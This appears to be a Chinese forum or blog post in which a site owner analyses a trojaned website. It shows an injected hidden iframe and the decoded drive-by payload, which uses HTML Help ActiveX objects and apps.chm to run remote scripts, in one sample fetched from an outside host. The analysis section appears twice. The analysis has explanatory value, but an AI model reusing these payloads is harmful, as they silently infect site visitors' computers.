打开网站,查看 源代码 ,查找<iframe 标签 就会找到在这段框架:<iframe src="http://www.fengyajade.com/jiaozhu.htm" name="zhu" width="0" height="0" frameborder="0">这就是 打开网站为什么,杀毒软件提示有木马的原因..经检查是在index.asp 最后一行。。上面的框架调用了本地文件jiaozhu.htm分析jiaozhu.htm 看源代码 是经过了java unescape 函数加密了。
解密后的真实代码是:
"<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>"在此我们分析代码就会注意到 在本地浏览器打开首页的时候,就会调用两个文件bbs003302.gifbbs003302.css至于这两文件是什么,怎么做的,我也没有时间去研究了。。通过系统你客户断自带的 file://C:/WINDOWS/Help/apps.chm 来达到执行木马网上有很多关于chm生成木马的材料,可以 百度一下的。。大概是通过 动感商城 注入 漏洞 获取你管理员密码了..从而上传 asp 类木马,修改你的程序,放置木马..
这个chm已经很早的漏洞了,没想到还有人在使用
这次代码为:
<SCRIPT LANGUAGE="JavaScript">
<!-- var Words
=""function OutWord(){var NewWords;NewWords = unescape(Words);alert(NewWords);} OutWord();// --></SCRIPT>
<HTML><head></head><BODY><div style="display:none"><OBJECT id="f1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language = JScript src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><script>f1.Click();setTimeout("f2.Click();",0);</script></BODY></HTML>
"<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>"在此我们分析代码就会注意到 在本地浏览器打开首页的时候,就会调用两个文件bbs003302.gifbbs003302.css至于这两文件是什么,怎么做的,我也没有时间去研究了。。通过系统你客户断自带的 file://C:/WINDOWS/Help/apps.chm 来达到执行木马网上有很多关于chm生成木马的材料,可以 百度一下的。。大概是通过 动感商城 注入 漏洞 获取你管理员密码了..从而上传 asp 类木马,修改你的程序,放置木马..
这个chm已经很早的漏洞了,没想到还有人在使用
这次代码为:
<SCRIPT LANGUAGE="JavaScript">
<!-- var Words
=""function OutWord(){var NewWords;NewWords = unescape(Words);alert(NewWords);} OutWord();// --></SCRIPT>
<HTML><head></head><BODY><div style="display:none"><OBJECT id="f1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language = JScript src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><script>f1.Click();setTimeout("f2.Click();",0);</script></BODY></HTML>
